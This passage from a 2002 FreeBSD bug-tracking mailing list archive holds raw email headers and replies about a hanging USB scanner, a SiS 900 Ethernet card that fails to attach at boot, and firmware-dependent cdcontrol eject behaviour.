PDT 2002 Responsible-Changed-Why: To maintainers. http://www.freebsd.org/cgi/query-pr.cgi?pr=41809 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 14:23:12 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 883B337B401 for ; Sat, 24 Aug 2002 14:23:11 -0700 (PDT) Received: from rootlabs.com (root.org [67.118.192.226]) by mx1.FreeBSD.org (Postfix) with SMTP id F0D2243E84 for ; Sat, 24 Aug 2002 14:23:10 -0700 (PDT) (envelope-from nate@rootlabs.com) Received: (qmail 68560 invoked by uid 1000); 24 Aug 2002 21:23:12 -0000 Date: Sat, 24 Aug 2002 14:23:12 -0700 (PDT) From: Nate Lawson To: Henning Meier-Geinitz Cc: freebsd-bugs@FreeBSD.org, freebsd-gnats-submit@freebsd.org Subject: Re: kern/41281: USB scanning works only once In-Reply-To: <20020824205802.GA568@vortex.meier-geinitz.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, 24 Aug 2002, Henning Meier-Geinitz wrote: > > ps axlww: > > UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND > 0 92 1 0 2 0 924 580 select Is ?? 0:00.00 /usr/sbin/usbd > 0 113 1 114 2 0 920 524 select Is ?? 0:00.00 moused -p /dev/psm0 -t auto > 0 131 123 0 18 0 1312 948 pause I v0 0:00.02 -csh (csh) > 0 140 131 0 10 0 1028 828 wait I v0 0:00.01 bash > 0 150 140 0 0 0 868 364 uscnrb I+ v0 0:00.00 ./testusb /dev/uscanner0 What is "testusb"? For some reason, you're just not getting any IO back from the scanner (it's blocking in usbd_bulk_transfer() forever). Please compile your kernel with USB_DEBUG, reboot, and try again. I'd like the dmesg output. Be sure to reply-all to keep GNATS in the cc. -Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 14:30: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9D7FB37B401 for ; Sat, 24 Aug 2002 14:30:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5C0BE43E4A for ; Sat, 24 Aug 2002 14:30:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7OLU4JU099296 for ; Sat, 24 Aug 2002 14:30:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7OLU4Yr099295; Sat, 24 Aug 2002 14:30:04 -0700 (PDT) Date: Sat, 24 Aug 2002 14:30:04 -0700 (PDT) Message-Id: <200208242130.g7OLU4Yr099295@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nate Lawson Subject: Re: kern/41281: USB scanning works only once Reply-To: Nate Lawson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41281; it has been noted by GNATS. From: Nate Lawson To: Henning Meier-Geinitz Cc: freebsd-bugs@FreeBSD.org, freebsd-gnats-submit@freebsd.org Subject: Re: kern/41281: USB scanning works only once Date: Sat, 24 Aug 2002 14:23:12 -0700 (PDT) On Sat, 24 Aug 2002, Henning Meier-Geinitz wrote: > > ps axlww: > > UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND > 0 92 1 0 2 0 924 580 select Is ?? 0:00.00 /usr/sbin/usbd > 0 113 1 114 2 0 920 524 select Is ?? 0:00.00 moused -p /dev/psm0 -t auto > 0 131 123 0 18 0 1312 948 pause I v0 0:00.02 -csh (csh) > 0 140 131 0 10 0 1028 828 wait I v0 0:00.01 bash > 0 150 140 0 0 0 868 364 uscnrb I+ v0 0:00.00 ./testusb /dev/uscanner0 What is "testusb"? For some reason, you're just not getting any IO back from the scanner (it's blocking in usbd_bulk_transfer() forever). Please compile your kernel with USB_DEBUG, reboot, and try again. I'd like the dmesg output. Be sure to reply-all to keep GNATS in the cc. -Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 18:40: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A13EF37B400 for ; Sat, 24 Aug 2002 18:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 98C5043E84 for ; Sat, 24 Aug 2002 18:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P1e2JU047948 for ; Sat, 24 Aug 2002 18:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7P1e2ra047947; Sat, 24 Aug 2002 18:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 77F7B37B400 for ; Sat, 24 Aug 2002 18:33:06 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 352A643E3B for ; Sat, 24 Aug 2002 18:33:06 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P1X6OT089714 for ; Sat, 24 Aug 2002 18:33:06 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7P1X6GP089713; Sat, 24 Aug 2002 18:33:06 -0700 (PDT) Message-Id: <200208250133.g7P1X6GP089713@www.freebsd.org> Date: Sat, 24 Aug 2002 18:33:06 -0700 (PDT) From: Erik Fair To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41988: autoconfig of SiS 900 10/100 ethernet fails at boot time in 4.6.2 GENERIC on AMD EasyNow PC Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41988 >Category: i386 >Synopsis: autoconfig of SiS 900 10/100 ethernet fails at boot time in 4.6.2 GENERIC on AMD EasyNow PC >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Aug 24 18:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Erik Fair >Release: 4.6.2 >Organization: The NetBSD Project >Environment: FreeBSD 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 >Description: FreeBSD 4.6.2 boots from CD-ROM and installs happily on this beast, but the built-in Ethernet (a SiS 900) does not work. The system description can be found here: http://www3pub.amd.com/products/cpg/easynow/prodbrief.html This system is "legacy-free" (i.e. no serial ports, no parallel port, no PC keyboard/mouse controller; that all is the province of USB). It also has no expansion slots, so adding in a supported PCI card is not poissible. Aside from the AMD K6-2, this system is built pretty much entirely of SiS support chips. >How-To-Repeat: Boot FreeBSD 4.6.2 GENERIC on the box. Observe: sis0: port 0xe400-0xe4ff mem 0xdd901000-0xxx901fff irq 11 at device 1.1 on pci0 sis0: Ethernet address: 00:30:67:03:3f:19 sis0: MII without any PHY! device_probe_and_attach: sis0 attach returned 6 observe that neither ifconfig nor netstat -i see the device once single user mode is achieved. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 20:33:15 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF88537B401; Sat, 24 Aug 2002 20:33:13 -0700 (PDT) Received: from cesium.clock.org (cesium.clock.org [192.5.16.65]) by mx1.FreeBSD.org (Postfix) with ESMTP id 76FF743E72; Sat, 24 Aug 2002 20:33:13 -0700 (PDT) (envelope-from fair@cesium.clock.org) Received: from cesium.clock.org (unknown [127.0.0.1]) by cesium.clock.org (Postfix) with ESMTP id E7692C791A; Sat, 24 Aug 2002 20:33:07 -0700 (PDT) From: "Erik E. Fair" Subject: Re: i386/41988: autoconfig of SiS 900 10/100 ethernet fails at boot time in 4.6.2 GENERIC on AMD EasyNow PC In-reply-to: <200208250140.g7P1e2Ds047939@freefall.freebsd.org> References: <200208250133.g7P1X6GP089713@www.freebsd.org> To: FreeBSD-gnats-submit@FreeBSD.org, freebsd-bugs@FreeBSD.org Date: Sat, 24 Aug 2002 20:33:07 -0700 Message-ID: <14891.1030246387@cesium.clock.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org One more useful URL: http://www.biostar.com.tw/products/barebone/sunflower.php3 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 20:40: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C3E1837B400 for ; Sat, 24 Aug 2002 20:40:04 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1ECE943E3B for ; Sat, 24 Aug 2002 20:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P3e3JU068397 for ; Sat, 24 Aug 2002 20:40:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7P3e36a068396; Sat, 24 Aug 2002 20:40:03 -0700 (PDT) Date: Sat, 24 Aug 2002 20:40:03 -0700 (PDT) Message-Id: <200208250340.g7P3e36a068396@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Erik E. Fair" Subject: Re: i386/41988: autoconfig of SiS 900 10/100 ethernet fails at boot time in 4.6.2 GENERIC on AMD EasyNow PC Reply-To: "Erik E. Fair" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/41988; it has been noted by GNATS. From: "Erik E. Fair" To: FreeBSD-gnats-submit@FreeBSD.org, freebsd-bugs@FreeBSD.org Cc: Subject: Re: i386/41988: autoconfig of SiS 900 10/100 ethernet fails at boot time in 4.6.2 GENERIC on AMD EasyNow PC Date: Sat, 24 Aug 2002 20:33:07 -0700 One more useful URL: http://www.biostar.com.tw/products/barebone/sunflower.php3 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Aug 24 23:20: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2CB0837B400 for ; Sat, 24 Aug 2002 23:20:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DFB5243E4A for ; Sat, 24 Aug 2002 23:20:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7P6K4JU012615 for ; Sat, 24 Aug 2002 23:20:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7P6K41b012614; Sat, 24 Aug 2002 23:20:04 -0700 (PDT) Date: Sat, 24 Aug 2002 23:20:04 -0700 (PDT) Message-Id: <200208250620.g7P6K41b012614@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Bruce Evans Subject: Re: bin/41920: cdcontrol eject doesn't work Reply-To: Bruce Evans Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41920; it has been noted by GNATS. From: Bruce Evans To: Eugene Grosbein Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/41920: cdcontrol eject doesn't work Date: Sun, 25 Aug 2002 16:16:02 +1000 (EST) On Fri, 23 Aug 2002, Eugene Grosbein wrote: > >Description: > I've updated to -STABLE of this week and > cdcontrol -f /dev/acd0c eject > doesn't work anymore. cdcontrol close does work, however. > > >How-To-Repeat: > Make sure CD tray is empty and closed. Type: > cdcontrol -f /dev/acd0c eject Workingness of eject and close seems to be very firmware-dependent. I see the following for cdcontrol in -current: : eject with disk in drive: succeeds eject without disk in drive: fails (no error) eject with disk in drive: fails (EBUSY) eject without disk in drive: fails (EBUSY) : all cases just work Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message